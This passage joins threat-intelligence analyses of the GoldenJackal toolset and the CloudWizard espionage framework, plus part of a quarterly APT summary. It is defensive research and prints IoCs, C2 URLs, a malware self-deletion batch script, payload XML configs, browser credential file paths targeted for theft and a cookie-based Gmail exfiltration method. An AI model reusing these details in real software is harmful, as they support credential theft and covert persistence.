When the malware detects a removable USB storage device, it will copy itself onto it. The path it will copy to is determined by listing all directories and selecting the one that was modified last. It will create a copy of itself on the drive root using the same directory name and change the directory’s attribute to “hidden”. This will result in the actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover, JackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when trying to access a directory.

In the following example, the removable drive “E:” was infected by the malware, which copied itself as Folder1.exe and changed the attributes of Folder1 to hide it:

Infected device

When the malware starts on a clean system and the parent process is explorer.exe and the file is located in a removable drive the behavior is as follows:

1. Opens the hidden directory
2. Performs the actions specified in the configuration files
3. Infects the system with the worm

The configuration files are embedded resources that contain XML data that can be used to instruct the worm to perform some actions:

• Drop a program and guarantee its persistence with a scheduled task
• Drop a program and execute it with the specified arguments
• Execute an existing program with the specified arguments

A valid configuration file looks like this:

<Resource type="install" interval="15" ext="exe" data="rcdata02" />

In this case, the worm was configured to install the PE file stored in another resource “rcdata02”, save it with the extension .exe and create a scheduled task to run it every 15 minutes.

Other valid examples are:

<Resource type="process" file="%TMP%\test.exe" args="" data="rcdata02" />

Drops the PE file stored in another resource “rcdata02” in “%TEMP%\test.exe” and executes it.

<Resource type="process" file="%WINDIR%\system32\ping.exe" args="1.1.1.1"/>

Executes the program “%WINDIR%\system32\ping.exe” with the argument “1.1.1.1”.

In our investigations, we observed only the first example and the malware was configured to install the JackalControl Trojan.

The installation procedure selects the malware location in much the same way as the procedure described in the section above. It differs from the other one because it enumerates the subdirectories in CommonAppData only and copies the file using the subdirectory’s names concatenated with another static value, upd.exe.

If it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described above.

• Google
• Mozilla
• Adobe
• Intel
• [Random GUID]

The worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically modified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. The script is dropped in the local Temp directory with a random name:

@echo off
@chcp 65001>nul
:check
@tasklist | findstr /i "%executingFilename%" >nul
@if %errorlevel%==0 goto check
@del /f /q /a h "%executingPath%"
@del /f /q "%Temp%\%randomname%.bat"

Future removable drives that are attached will be re-infected with JackalWorm.

It is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the embedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes, which is much bigger than their actual content:

• Rcdata01 – XML config – Size: 67 bytes
• Rcdata02 – JackalControl Trojan – Size: 27136 bytes

It means there are 166770 bytes of unknown data. Most of them are part of the legitimate notepad.exe Windows utility, and specifically, the first 0x6A30 bytes were overwritten. After the legitimate notepad.exe image, we found also the following XML configurations:

<Resource type="scheduler" interval="15" ext="exe" args="" data="notepad" />

<Resource type="process" file="cmd.exe" args="/c echo TEST > 
%USERPROFILE%\Desktop\test.txt" />

The first XML shows a new type value: ‘scheduler’, which is not specified in the code. The second XML shows that this specific resource was used for testing purposes and the attacker was trying to run cmd.exe to write the word “TEST” in a text file in the desktop: %USERPROFILE%\Desktop\test.txt.

JackalPerInfo

This malware was developed to collect information about the compromised system, as well as a specific set of files that could potentially be used to retrieve stored credentials and the user’s web activities. The attacker named it “perinfo”, a contraction of the program’s main class name PersonalInfoContainer.

Its behaviour changes according to the number of arguments provided during execution. Specifically, when executed with only one argument, the malware collects a predefined set of information and stores it in a binary file compressed with GZIP. The filename is specified in the argument provided. When executed with two arguments, the malware uses the first argument to load a previously generated binary file and extract all the information to a directory specified by the second argument.

By default, the program should be executed with one argument. Once it is executed, the malware starts collecting information about the system using a specific function, GetSysInfo, which collects the following information:

Computer name: %s
OS version: %S
Domain: %S
User: %S
Local time: %s
Interfaces:
%Interface Name%
    DESC:
    TYPE:
    MAC:
    IP:
    GW:
    DNS:
    DHCP:
    DOMAIN:
Remote IP:
Current directory:
Drives:
    C:\ Fixed
    D:\ CDRom
...
Applications:
    %Installed Application1%
    %Installed Application2%
...
Processes:
    %Process Name 1%
        Desc: %s
        Name: %s
        Path: %s
    %Process Name 2%
...

This specific function was also observed in the first JackalControl variants, but was removed from newer variants.

The malware continues its operation by enumerating the logical drives on the system; and for each one it enumerates the files in the root path. The collected info includes the last write time, the filename, and the file size.

It then enumerates the Users directory in the system drive, usually C:\Users\. For each user, it enumerates the content of the following directories:

• Desktop
• Documents
• Downloads
• AppData\Roaming\Microsoft\Windows\Recent

It tries also to acquire the following files:

Desktop\*.txt
Documents\*.txt
AppData\Local\Microsoft\Windows\WebCache\*.log
AppData\Roaming\Microsoft\Windows\Cookies\*.txt
AppData\Local\Google\Chrome\User Data\*\Bookmarks
AppData\Local\Google\Chrome\User Data\*\Cookies
AppData\Local\Google\Chrome\User Data\*\History
AppData\Local\Google\Chrome\User Data\*\Login Data
AppData\Local\Google\Chrome\User Data\*\Shortcuts 
AppData\Local\Google\Chrome\User Data\*\Web Data
AppData\Roaming\Opera\Opera\*\bookmarks.adr
AppData\Roaming\Opera\Opera\*\global_history.dat
AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite
AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite
AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite

The malware attempts to steal credentials stored in the victim’s browser databases, as well as other information such as cookies that could be used to gain access to web services.

Finally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm, and stores everything in the file specified with the first argument provided by the attacker.

JackalScreenWatcher

This tool is used to collect screenshots of the victim’s desktop and sends the pictures to a remote, hard-coded C2 server:

hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php

This specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably part of a unique framework.

The malware can handle some arguments that are optional and can be provided as input:

• -r resolution ratio (default 1.0)
• -i interval (default 10 seconds)
• -n specify a custom agent id. By default, this value is equal to: %Hostname%\%Username%

The program’s primary function involves running a thread that scans all displays on the system, checking their dimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the malware detects user activity, it captures a screenshot and sends it to the remote server.

User activity is detected by monitoring the cursor’s position and checking if it has changed since the last recorded position. After uploading a screenshot, it waits for a specified interval before restarting the loop.

The screenshots are uploaded inside an encrypted payload using HTTP Post requests.

The encrypted payload is similar to that used by JackalSteal and contains the following information:

|<AES_Key,AES_IV><Remote filename><Screenshot>|

AES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.

The Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The RSA key is the same as that observed in other JackalSteal components.

Infrastructure

GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server.

We don’t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that many of the websites were using obsolete versions of WordPress and some had also been defaced or infected with previously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. For this reason, we assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.

The remote webpage usually replies with a fake “Not Found” page. The HTTP response status code is “200”, but the HTTP body shows a “Not found” webpage.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">          
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL %FILE PATH% was not found on this server.</p>
<hr>
<address>%SERVER%</address>
</body></html>

In specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body is followed by a long list of standard Windows new line sequences – “\r\n” – and finally the previously mentioned delimiter:

<!-- DEBUGDATA::%ENCODED_DATA% -->

Victims

Over the years, we have observed a limited number of attacks against government and diplomatic entities in the Middle East and South Asia. We observed victims in: Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.

Geography of victims

Attribution

We are unable to link GoldenJackal to any known actor.

During our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we noticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by Kazuar.

Specifically, Kazuar gets the MD5 hash of a predefined string and then XORs it with a four-byte unique “seed” from the machine. The seed is obtained by fetching the serial number of the volume where the operating system is installed.

public static Guid md5_plus_xor(string string_0) {
  byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier);
  byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0));
 for (int i = 0; i < array.Length; i++) {
    byte[] array2 = array;
    int num = i;
    array2[num] ^= bytes[i % bytes.Length];
  }
  return new Guid(array);
}

JackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the serial number of the volume where the operating system is installed, to generate a unique seed with the MD5 algorithm. Then it uses the resulting byte array, summing every two consecutive bytes from the resulting MD5 hash and placing the resulting bytes (modulus 256) as the sequence that constructs the final BOT_ID.

Code snippet used to generate the BOT_ID

Moreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla TTP.

Last but not least, the groups share an interest in the same targets, and in one specific case we observed that a victim machine was infected with a Turla artifact two months before the GoldenJackal infection.

Despite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and Turla, since neither of these is unique to either threat actor. The use of compromised WordPress websites is not a unique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT active in the Middle East that uses .NET malware. The code similarities are related to a single function in a .NET program that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a false flag. Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to replicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the fact that the victims are high-profile targets that could be considered interesting by different actors.

Conclusions

GoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are believed to have started in June 2019, this group and the related samples are still generally unknown.

The group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry, the number of targets is very low and most of them were related to government or diplomatic entities. Moreover, some of the samples were deployed only on systems that were not protected by Kaspersky during the infection phase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.

Their toolkit seems to be under development – the number of variants shows that they are still investing in it. The latest malware, JackalWorm, appeared in the second half of 2022 and appears to still be in the testing phase. This tool was unexpected because in previous years the attacks were limited to a small group of high-profile entities, and a tool like JackalWorm is probably difficult to bind and can easily get out of control.

More information about GoldenJackal, including IoCs and YARA rules, are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

MD5 hashes

JackalControl
5ed498f9ad6e74442b9b6fe289d9feb3
a5ad15a9115a60f15b7796bc717a471d
c6e5c8bd7c066008178bc1fb19437763
4f041937da7748ebf6d0bbc44f1373c9
eab4f3a69b2d30b16df3d780d689794c
8c1070f188ae87fba1148a3d791f2523

JackalSteal
c05999b9390a3d8f4086f6074a592bc2

JackalWorm
5de309466b2163958c2e12c7b02d8384

JackalPerInfo
a491aefb659d2952002ef20ae98d7465

JackalScreenWatcher
1072bfeee89e369a9355819ffa39ad20

Legitimate compromised websites

JackalControl C2
hxxp://abert-online[.]de/meeting/plugins[.]php
hxxp://acehigh[.]host/robotx[.]php
hxxp://assistance[.]uz/admin/plugins[.]php
hxxp://cnom[.]sante[.]gov[.]ml/components/com_avreloaded/views/popup/tmpl/header[.]php
hxxp://info[.]merysof[.]am/plugins/search/content/plugins[.]php
hxxp://invest[.]zyrardow[.]pl/admin/model/setting/plugins[.]php
hxxp://weblines[.]gr/gallery/gallery_input[.]php
hxxp://www[.]wetter-bild[.]de/plugins[.]php
hxxps://ajapnyakmc[.]com/wp-content/cache/index[.]php
hxxps://asusiran[.]com/wp-content/plugins/persian-woocommerce/include/class-cache[.]php
hxxps://asusiran[.]com/wp-content/themes/woodmart/inc/modules/cache[.]php
hxxps://croma[.]vn/wp-content/themes/croma/template-parts/footer[.]php
hxxps://den-photomaster[.]kz/wp-track[.]php
hxxps://eyetelligence[.]ai/wp-content/themes/cms/inc/template-parts/footer[.]php
hxxps://finasteridehair[.]com/wp-includes/class-wp-network-statistics[.]php
hxxps://gradaran[.]be/wp-content/themes/tb-sound/inc/footer[.]php
hxxps://mehrganhospital[.]com/wp-includes/class-wp-tax-system[.]php
hxxps://meukowcognac[.]com/wp-content/themes/astra/page-flags[.]php
hxxps://nassiraq[.]iq/wp-includes/class-wp-header-styles[.]php
hxxps://new[.]jmcashback[.]com/wp-track[.]php
hxxps://news[.]lmond[.]com/wp-content/themes/newsbook/inc/footer[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/cache/functions[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/dt-the7/inc/cache[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/twentyfifteen/content-manager[.]php
hxxps://sbj-i[.]com/wp-content/plugins/wp-persian/includes/class-wp-cache[.]php
hxxps://sbj-i[.]com/wp-content/themes/hamyarwp-spacious/cache[.]php
hxxps://sokerpower[.]com/wp-includes/class-wp-header-styles[.]php
hxxps://technocometsolutions[.]com/wp-content/themes/seofy/templates-sample[.]php
hxxps://www[.]djstuff[.]fr/wp-content/themes/twentyfourteen/inc/footer[.]php
hxxps://www[.]perlesoie[.]com/wp-content/plugins/contact-form-7/includes/cache[.]php
hxxps://www[.]perlesoie[.]com/wp-content/themes/flatsome/inc/classes/class-flatsome-cache[.]php

JackalSteal/JackalScreenWatcher C2
hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php
hxxps://winoptimum[.]com/wp-includes/customize/class-wp-customize-sidebar-refresh.php

Distribution websites
hxxps://www[.]pak-developers[.]net/internal_data/templates/template.html
hxxps://www[.]pak-developers[.]net/internal_data/templates/bottom.jpg

In March 2023, we uncovered a previously unknown APT campaign in the region of the Russo-Ukrainian conflict that involved the use of PowerMagic and CommonMagic implants. However, at the time it was not clear which threat actor was behind the attack. Since the release of our report about CommonMagic, we have been looking for additional clues that would allow us to learn more about this actor. As we expected, we have been able to gain a deeper insight into the “bad magic” story.

While looking for implants bearing similarities with PowerMagic and CommonMagic, we identified a cluster of even more sophisticated malicious activities originating from the same threat actor. What was most interesting about it is that its victims were located not only in the Donetsk, Lugansk and Crimea regions, but also in central and western Ukraine. Targets included individuals, as well as diplomatic and research organizations. The newly discovered campaign involved using a modular framework we dubbed CloudWizard. Its features include taking screenshots, microphone recording, keylogging and more.

Over the years, the infosec community has discovered multiple APTs operating in the Russo-Ukrainian conflict region – Gamaredon, CloudAtlas, BlackEnergy and many others. Some of these APTs have long been forgotten in the past – such as Prikormka (Operation Groundbait), discovered by ESET in 2016. While there have been no updates about Prikormka or Operation Groundbait for a few years now, we discovered multiple similarities between the malware used in that campaign, CommonMagic and CloudWizard. Upon further investigation, we found that CloudWizard has a rich and interesting history that we decided to dig into. Our findings we also shared on the cybersecurity conference Positive Hack Days. You can watch our presentation here.

Initial findings

Our investigation started with telemetry data coming from an active infection, with malware running as a suspicious Windows service named “syncobjsup”. This service was controlled by a DLL with an equally suspicious path “C:\ProgramData\Apparition Storage\syncobjsup.dll”. Upon execution, we found this DLL to decrypt data from the file mods.lrc that is located in the same directory as the DLL. The cipher used for decryption was RC5, with the key 88 6A 3F 24 D3 08 A3 85 E6 21 28 45 77 13 D0 38. However, decryption of the file with the standard RC5 implementation yielded only junk data. A closer look into the RC5 implementation in the sample revealed that it was faulty:

for (i = 0; i < 4; i += 2)
{
    A = buf[i];
    B = buf[i + 1];
    for (j = 12; j > 0; --j)
    {
        v2 = rotate_right(B - S[2 * i + 1], A);
        B = A ^ v2;
        A ^= v2 ^ rotate_right(A - S[2 * i], A ^ v2);
    }
}

The bug is in the inner loop: it uses the variable i instead of j.

A search for this incorrect implementation revealed a GitHub gist of the code that has been likely borrowed by the implant’s developers. In the comments to this gist, GitHub users highlight the error:

What is also interesting is that the key from the gist is the same as the one used in the syncobjsup.dll library.

The decrypted file looked to us like a virtual file system (VFS), containing multiple executables and their JSON-encoded configurations:

Each entry in this VFS contains magic bytes (‘CiCi’), a ROR6 hash of the entry name, as well as the entry size and contents.

Inside mods.lrc, we found:

• Three DLLs (with export table names Main.dll, Crypton.dll and Internet.dll);
• A JSON configuration of these DLLs.

The syncobjsup.dll DLL iterates over VFS entries, looking for an entry with the name “Main” (ROR6 hash: 0xAA23406F). This entry contains CloudWizard’s Main.dll orchestrator library, which is reflectively loaded and launched by invoking its SvcEntry export.

Digging into the orchestrator

Upon launching, the orchestrator spawns a suspended WmiPrvSE.exe process and injects itself into it. From the WmiPrvSE.exe process, it makes a backup of the VFS file, copying mods.lrc to mods.lrs. It then parses mods.lrs to obtain all the framework module DLLs and their configurations. As mentioned above, configurations are JSON files with dictionary objects:

{
    "Screenshot": {
        "type": "3",
        "intervalSec": "4",
        "numberPack": "24",
        "winTitle": [
            "SKYPE",
            "VIBER"
        ]
    },
    "Keylogger": {
        "bufSize": "100"
    },
    "Microphone": {
        "intervalSec": "500",
        "acousticStart": "1"
    }
}

The orchestrator itself contains a configuration with parameters such as:

• Victim ID (e.g., 03072020DD);
• Framework version (latest observed version is 5.0);
• Interval between two consecutive heartbeats.

After launching modules, the orchestrator starts communicating with the attackers by sending heartbeat messages. Each heartbeat is a JSON file with victim information and a list of loaded modules:

{
      "name": "<victim_id>",
	"romoID": "2",
	"bitOS": "64",
	"version": "5.0",
	"serial": "<infection_timestamp>",
	"keyID": "<key_id>",
	"ip": "0.0.0.0",
	"state": [
		"Main","Crypton","Internet","Screenshot",
		"USB","Keylogger","Gmail"
	],
	"state2": [
    		{"Module": "Main","time_mode": "2","Version": "4.7"},
    		{"Module": "Crypton","time_mode": "2","Version": "1.0"},
    		{"Module": "Internet","time_mode": "2","Version": "0.07"},
    		{"Module": "Screenshot","time_mode": "2","Version": "0.01"},
    		{"Module": "USB","time_mode": "2","Version": "0.01"},
    		{"Module": "Keylogger","time_mode": "2","Version": "0.01"},
    		{"Module": "Gmail","time_mode": "2","Version": "0.06"}
	]
}

This JSON string is encrypted with the cryptography module (Crypton.dll from the VFS) and sent to the attackers with the internet communication module (Internet.dll).

In response to the heartbeats, the orchestrator receives commands allowing it to perform module management: install, start, stop, delete modules or change their configurations. Each command contains magic bytes (DE AD BE EF) and a JSON string (e.g., {"Delete": ["Keylogger", "Screenshot"]}), optionally followed by a module DLL file.

Encryption and communication

As we have mentioned above, two modules (Crypton.dll and Internet.dll) are bundled with every installation of the CloudWizard framework. The Crypton module performs encryption and decryption of all communications. It uses two encryption algorithms:

• Heartbeat messages and commands are encrypted with AES (the key is specified in the JSON configuration VFS file)
• Other data (e.g., module execution results) is encrypted with a combination of AES and RSA. First, the data is encrypted with a generated pseudorandom AES session key, and then the AES key is encrypted with RSA.

if ( buffers->results.lenstr && buffers->results.str ) {
	v10 = RSA_Encrypt(AES_KEY, 32, &v8, &v7, pubKey, pubKeySize);
	if (v10) {
  		free(v8);
  		return v10;
	}
	v10 = AES_Encrypt(buffers->results.str, 
                        buffers->results.lenstr, 
                        &v4, &v6, AES_KEY);
	if (v10)
  		goto LABEL_11;
}
if (buffers->state.lenstr && buffers->state.str) {
  	v10 = AES_Encrypt(buffers->state.str,  
                        buffers->state.lenstr, 
                        &v3, &v5, phpKey);
  	if (v10)
    		goto LABEL_11;
}

• Cloud storages: OneDrive, Dropbox, Google Drive
• Web-based C2 server

The primary cloud storage is OneDrive, while Dropbox and Google Drive are used if OneDrive becomes inaccessible. The module’s configuration includes OAuth tokens required for cloud storage authentication.

As for the web server endpoint, it is used when the module can’t access any of the three cloud storages. To interact with it, it makes a GET request to the URL specified in its configuration, getting new commands in response. These commands likely include new cloud storage tokens.

While examining the strings of the network module, we found a string containing the directory name from the developer’s machine: D:\Projects\Work_2020\Soft_Version_5\Refactoring.

Module arsenal

Information gathering is performed through auxiliary DLL modules that have the following exported functions:

Modules can persist upon reboot (in this case they are saved in the mods.lrs VFS file) or executed in memory until the machine is shut down or the module is deleted by the operator.

In total, we found nine auxiliary modules performing different malicious activities such as file gathering, keylogging, taking screenshots, recording the microphone and stealing passwords.

The module that looked most interesting to us is the one that performs email exfiltration from Gmail accounts. In order to steal, it reads Gmail cookies from browser databases. Then, it uses the obtained cookies to access the Gmail web interface in legacy mode by making a GET request to  https://mail.google.com/mail/u/<account ID>/?ui=html&zy=h. When legacy mode is accessed for the first time, Gmail prompts the user to confirm whether they really wants to switch to legacy mode, sending the following webpage in response:

If the module receives such a prompt, it simulates a click on the “I’d like to use HTML Gmail” button by making a POST request to a URL from the prompt’s HTML code.

Having obtained access to the legacy web client, the module exfiltrates activity logs, the contact list and all the email messages.
What’s also interesting is that the code for this module was partially borrowed from the leaked Hacking Team source code.

Back to 2017

After obtaining the CloudWizard’s orchestrator and its modules, we were still missing one part of the infection chain: the framework installer. While searching through older telemetry data, we were able to identify multiple installers that were used from 2017 to 2020. The version of the implant installed at that time was 4.0 (as we wrote above, the most recent version we observed is 5.0).

The uncovered installer is built with NSIS. When launched, it drops three files:

• C:\ProgramData\Microsoft\WwanSvc\WinSubSvc.exe
• C:\ProgramData\Microsoft\MF\Depending.GRL (in other versions of the installer, this file is also placed under C:\ProgramData\Microsoft\MF\etwdrv.dll)
• C:\ProgramData\System\Vault\etwupd.dfg

Afterwards, it creates a service called “Windows Subsystem Service” that is configured to run the WinSubSvc.exe binary on every startup.

It is worth noting that the installer displays a message with the text “Well done!” after infection:

This may indicate that the installer we discovered is used to deploy CloudWizard via physical access to target machines, or that the installer attempts to mimic a Network Settings (as displayed in the window title) configurator.

The old (4.0) and new (5.0) CloudWizard versions have major differences, as outlined in the table below:

Attribution magic

After spending considerable time researching CloudWizard, we decided to look for clues that would allow us to attribute it to an already known actor. CloudWizard reminded us of two campaigns observed in Ukraine and reported in public: Operation Groundbait and Operation BugDrop. Operation Groundbait was first described by ESET in 2016, with the first implants observed in 2008. While investigating Operation Groundbait, ESET uncovered the Prikormka malware, which is  “the first publicly known Ukrainian malware that is being used in targeted attacks”. According to ESET’s report, the threat actors behind Operation Groundbait “most likely operate from within Ukraine”.

As for Operation BugDrop, it is a campaign discovered by CyberX in 2017. In their report, CyberX claims (without providing strong evidence) that Operation BugDrop has similarities with Operation Groundbait. And indeed, we have discovered evidence confirming this:

• Prikormka USB DOCS_STEALER module (MD5: 7275A6ED8EE314600A9B93038876F853B957B316) contains the PDB path D:\My\Projects_All\2015\wallex\iomus1_gz\Release\iomus.pdb;
• BugDrop USB stealer module (MD5: a2c27e73bc5dec88884e9c165e9372c9) contains the PDB path D:\My\Projects_All\2016\iomus0_gz\Release\usdlg.pdb.

The following facts allow us to conclude with medium to high confidence that the CloudWizard framework is operated by the actor behind Operation Groundbait and Operation BugDrop:

• ESET researchers found the loader of CloudWizard version 4.0 dll (with the export name LCrPsdNew.dll) to be similar to a Prikormka DLL. The similarity between these two files has been noted in the Virus Bulletin 2019 talk ‘Rich headers: leveraging the mysterious artifact of the PE format’ (slide 42)

  

  Slide 42 of the VB2019 ‘Rich headers: leveraging the mysterious artifact of the PE format’ talk

• ESET detects a loader of a CloudWizard v. 4 sample (MD5: 406494bf3cabbd34ff56dcbeec46f5d6, PDB path: D:\Projects\Work_2017\Service\Interactive Service_system\Release\Service.pdb) as Win32/Prikormka.CQ.
• According to our telemetry data, multiple infections with the Prikormka malware ended with a subsequent infection with the CloudWizard framework
• Implementation of several modules of CloudWizard resembles the corresponding one from the Prikormka and BugDrop modules, though rewritten from C to C++:
  • USB stealer modules retrieve the serial numbers and product IDs of connected USB devices via the IOCTL_STORAGE_QUERY_PROPERTY system call. The default fallback value in case of failure is the same, “undef”.

    

    Retrieval of USB device serial number and product ID in BugDrop (MD5: F8BDE730EA3843441A657A103E90985E)

    

    Retrieval of USB device serial number and product ID in CloudWizard (MD5: 39B01A6A025F672085835BD699762AEC)

    

    Assignment of the ‘undef’ string in BugDrop (left) and CloudWizard (right) in the samples above

  • The modules for taking screenshots use the same list of window names that trigger an increase in the frequency of screenshot taking: ‘Skype’ and ‘Viber’. CloudWizard and Prikormka share the same default value for the screenshot taking interval (15 minutes).

    

    Comparison of the window title text in Prikormka (MD5: 16793D6C3F2D56708E5FC68C883805B5)

    

    Addition of the ‘SKYPE’ and ‘VIBER’ string to a set of window titles in CloudWizard (MD5: 26E55D10020FBC75D80589C081782EA2)

  • The file listing modules in both Prikormka and CloudWizard samples have the same name: Tree. They also use the same format string for directory listings: “\t\t\t\t\t(%2.2u,%2.2u.%2.2u.%2.2u)\n”.

    

    

    Use of the same format string for directory listings in Prikormka (above, MD5: EB56F9F7692F933BEE9660DFDFABAE3A) and CloudWizard (below, MD5: BFF64B896B5253B5870FE61221D9934D)

  • Microphone modules record sound in the same way: first making a WAV recording using Windows Multimedia API and then converting it to MP3 using the LAME library. While this pattern is common in malware, the strings used to specify settings for the LAME library are specific: 8000 Hz and 16 Kbps. Both Prikormka and CloudWizard modules extract integers from these strings, using them in the LAME library.
  • A similar order of extensions is used in extension lists found in Prikormka and CloudWizard modules:
    

    Extension lists in Prikormka (left, MD5: EB56F9F7692F933BEE9660DFDFABAE3A) and CloudWizard (right, MD5: BFF64B896B5253B5870FE61221D9934D)

• In Prikormka, the names of files to be uploaded to the C2 server have the name format mm.yy_hh.mm.ss.<extension>. In CloudWizard, the files have the name format dd.mm.yyyy_hh.mm.ss.ms.dat. The date substituted into the name format strings is retrieved from the GetLocalTime API function.
• The C2 servers of both Prikormka and CloudWizard are hosted by Ukrainian hosting services. Additionally, there are similarities between BugDrop and CloudWizard in terms of exfiltrating files to the Dropbox cloud storage.
• Victims of Prikormka, BugDrop and CloudWizard are located in western and central Ukraine, as well as the area of conflict in Eastern Europe.

As for the similarities between CloudWizard and CommonMagic, they are as follows:

• The code that performs communication with OneDrive is identical in both frameworks. We did not find this code to be part of any open-source library. This code uses the same user agent: “Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136”.

The same strings in the internet communication module of CloudWizard (left, MD5: 84BDB1DC4B037F9A46C001764C115A32) and CommonMagic (right, MD5: 7C0E5627FD25C40374BC22035D3FADD8)

• Both frameworks, CloudWizard (version 4) and CommonMagic use the RC5Simple library for encryption. Files encrypted with RC5Simple start with a 7-byte header, which is set to ‘RC5SIMP’ in the library source code. However, this value has been changed in the malicious implants: DUREX43 in CloudWizard and Hwo7X8p in CommonMagic. Additionally, CloudWizard and CommonMagic use the RapidJSON library for parsing JSON objects.
• Names of files uploaded to the C2 server in CommonMagic have the format mm.dd _hh.mm.ss.ms.dat (in CloudWizard, the name format is dd.mm.yyyy_hh.mm.ss.ms.dat).
• Victim IDs extracted from CloudWizard and CommonMagic samples are similar: they contain a date followed by the two same letters, e.g. 03072020DD, 05082020BB in CloudWizard and WorkObj20220729FF in CommonMagic.
• Victims of CommonMagic and CloudWizard are located in the area of conflict in Eastern Europe.

So what?

We initiated our investigation back in 2022, starting with simple malicious PowerShell scripts deployed by an unknown actor and ended up discovering and attributing two large related modular frameworks: CommonMagic and CloudWizard. As our research demonstrates, their origins date back to 2008, the year the first Prikormka samples were discovered. Since 2017, there have been no traces of Groundbait and BugDrop operations. However, the actor behind these two operations has not ceased their activity, and has continued developing their cyberespionage toolset and infecting targets of interest for more than 15 years.

Indicators of compromise

NSIS installer

MD5 0edd23bbea61467f144d14df2a5a043e
SHA256 177f1216b55058e30a3ce319dc1c7a9b1e1579ea3d009ba965b18f795c1071a4

Loader (syncobjsup.dll)

MD5 a2050f83ba2aa1c4c95567a5ee155dca
SHA256 041e4dcdc0c7eea5740a65c3a15b51ed0e1f0ebd6ba820e2c4cd8fa34fb891a2

Orchestrator (Main.dll)

MD5 0ca329fe3d99acfaf209cea559994608
SHA256 11012717a77fe491d91174969486fbaa3d3e2ec7c8d543f9572809b5cf0f2119

Domains and IPs

91.228.147[.]23
curveroad[.]com

For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research; and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2023.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

While investigating possible Turla activities, we discovered that the TunnusSched backdoor (aka QUIETCANARY) was being delivered from a Tomiris implant. Having tracked Tomiris since 2021, we believe, with medium-to-high confidence, that it is distinct from Turla. So, we think that either Tomiris is conducting false-flag attacks implicating Turla, or (more likely) that Turla and Tomiris co-operate.

Russian-speaking activity

During our investigation into Tomiris’s activities in 2022, we identified the use of a previously undocumented implant developed in Rust, dubbed “JLORAT”, which was in operation as early as August 2022 and remained active into 2023.

Chinese-speaking activity

We discovered a new in-memory implant, called TargetPlug, that has been used to target game developers in South Korea since at least October 2022. Further analysis revealed that the malware is signed with valid certificates and appears to have a connection to the threat actor Winnti, a connection established through several overlaps such as shared infrastructure, code signing and victimology. We reported the misuse of the stolen “Zepetto Co.” certificate via the appropriate channel.

Middle East

We have identified ongoing spear-phishing campaigns targeting Middle Eastern countries dating back to July 2021. We assess that MuddyWater, a threat actor believed to originate from the same region, is operating these campaigns. Based on our analysis, MuddyWater was able to infect several victims in the Middle East and North Africa. The group went after high-profile entities operating in the government, aviation, energy, telecoms and banking sectors. Our investigation led us to identify the targets of interest to the attackers in this campaign. In fact, a number of spear-phishing emails seem to have been crafted and sent to employees of companies in Saudi Arabia, Turkey, the UAE, Egypt, Jordan, Bahrain, Canada, Kuwait, Israel, Syria, Azerbaijan, Armenia and Malaysia.

